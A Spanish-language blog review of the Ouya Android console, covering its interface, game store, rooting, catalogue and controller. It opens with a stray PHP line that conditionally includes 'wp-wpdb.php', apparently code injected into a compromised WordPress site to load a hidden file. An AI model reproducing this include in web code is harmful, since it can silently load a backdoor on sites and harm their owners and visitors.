if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Ouya: La consola más flexible – La Fortaleza de LeChuck

Análisis Ouya: La consola más flexible

Unos para mal, otros para bien, pero todos, absolutamente todos los aficionados de los videojuegos, nos hemos llenado la boca hablando de esta consola. Ouya, una consola low-cost con ideas muy claras, utilizando el sistema operativo Android como plataforma para reproducir videojuegos. Tras una mala experiencia con su recepción y un mes de varios tientos y trapicheos, os comento mi opinión y análisis de esta videoconsola de sobremesa alternativa.

El hype ha sido desde su anuncio el estandarte de Ouya, y es que cuando comenzó la Kickstarter para su financiación nadie pensó que podía llegar a hacer tanto ruido. Una consola barata con hardware de móvil de alta gama y que tenía como himno el «Juegos gratis y máxima flexibilidad». Quizás el simple hecho de triunfar en Kickstarter también te da unas alas publicitarias de cara a  salir al mercado más allá de los que apoyan la causa, y eso se ha notado desde el lanzamiento con la constante unión de muchos desarrolladores independientes apoyando Ouya.

Desde el principio, lo que primaba es la simplicidad. Simple para jugar, simple para comprar juegos, para probarlos antes de pagarlos, para desarrollar y publicar (Usando Android como sistema operativo y abierta a utilizar la propia consola como Kit de desarrollo). Todo eso, y juntando sus prestaciones de móvil Android de gama alta y un precio y diseño atractivo hizo que Ouya se hiciera realidad.

Una consola abierta donde no solo podemos instalar juegos, si no también aplicaciones Android como si fuera cualquier teléfono, con todo lo que ello comporta. Ya de por sí la propia tienda de Ouya trae consigo, además de juegos, algunas aplicaciones interesantes usables en tu televisión (Twitch.tv, XBMC, Plex, etc) además de unos cuantos emuladores (Sí, sí, sin hacer trapicheos, eso sí, luego búscate los juegos tú…)

La experiencia de uso con la consola es muy buena, realmente la interfaz es sencilla y casi ni te enteras de que sea Android (Si no llega a ser porque si te vas a los Ajustes de configuración te sale el menú de Ajustes de Android JellyBean tal cual). «Descubrir» es la tienda de juegos, mientras «Jugar» obviamente es para reproducir los que ya hemos descargado. Nos queda «Crear» que es donde los desarrolladores prueban sus juegos y aplicaciones propias en el formato de Android «APK» en la consola. El último apartado de la interfaz es la de configuración que hace bien su trabajo y ya está.

La cosa se pone magra cuando queremos aprovechar los extras por ser Android. Con un poco de meneo puedes rootear tu Ouya (Para tener permiso de «superusuario» y poder instalar cosas que Android no te permite sin ello), así, por ejemplo, puedes instalar la Play Store con algunos dolores de cabeza. Mi intención era bajar algunos juegos de pago que tenía en Android (Usando mi misma cuenta del movil) que se hacían injugables desde la pantalla táctil (GTA III, Vice City, Max Payne, etc). Se consiguió de cierta manera, pero la interfaz de algunos juegos o pantallas no se adapta bien a tu televisión, al no estar adaptado para Ouya, por tanto algunas cosas no son nada usables, aunque el mando si funcione como cualquier USB en un terminal Android (Si no ves los medidores de vida y tal… no es la mejor forma de jugar ni de disfrutar)

En cuanto al catálogo de juegos, es verdad, todavía está bastante verde, pero si que van saliendo juegos bastante interesantes. No solo es el famoso multijugador Towerfall, también hay muchos más juegos la mar de divertidos sin mucho presupuesto ni pretensiones, además de un buen puñado de juegos realmente feos que no llaman la atención ni artistica, ni técnica ni jugablemente (Es lo que tiene lo indie, que hay cosas interesantes y con talento, y otras que duele llamar juegos). Es decir que también, como en las mejores consolas, hay juegos que es mejor evitarlos.

Una de las cosas que voy a defender y la mayoría de análisis atacan es el mando. El mando cumple perfectamente. Realmente es cómodo, y sí, se nota algo ligero y algunos botones bastante «chinorris», pero todo funciona bien. La única pega que le pondría es el D-Pad, que no está en la mejor posición si va a ser de uso habitual. Uno cree que la mejor forma de controlar los plataformas 2D es con un pad digital. Aún así, todos los juegos de Ouya están diseñados para usarlos con el stick sin problema.

Me ha sorprendido gratamente algo que se comenta muy poco, lo útil que es tener el pequeño y poco atractivo trackpad en el centro del mando. Adelántandose  a PS4 el mando de Ouya posee uno, y para ciertos usos como la navegación por internet o el moverse a través de las aplicaciones externas no totalmente compatibles con Ouya, al pasar el dedo por el trackpad hace aparecer un puntero que te salva la vida.

En conclusión, teniendo en cuenta su tamaño, su precio y sobretodo, su flexibilidad a la hora de instalar juegos, aplicaciones multimedia, enchufarle un disco duro o pendrive, compatibilidad con cualquier mando USB, etc… Hacen de Ouya una consola interesante para cualquier viciado que se precie. Y lo mejor es que eso es solo el principio, sin hacer mucho ruido, creo que han llegado para quedarse.

¡Buenas noticias! Ouya va a ser distribuida en España oficialmente por Badland Games, con lanzamiento el 21 de Marzon ¡Así que en nada tendréis la mejor oferta para comprar Ouya en OfertasJuegos.com!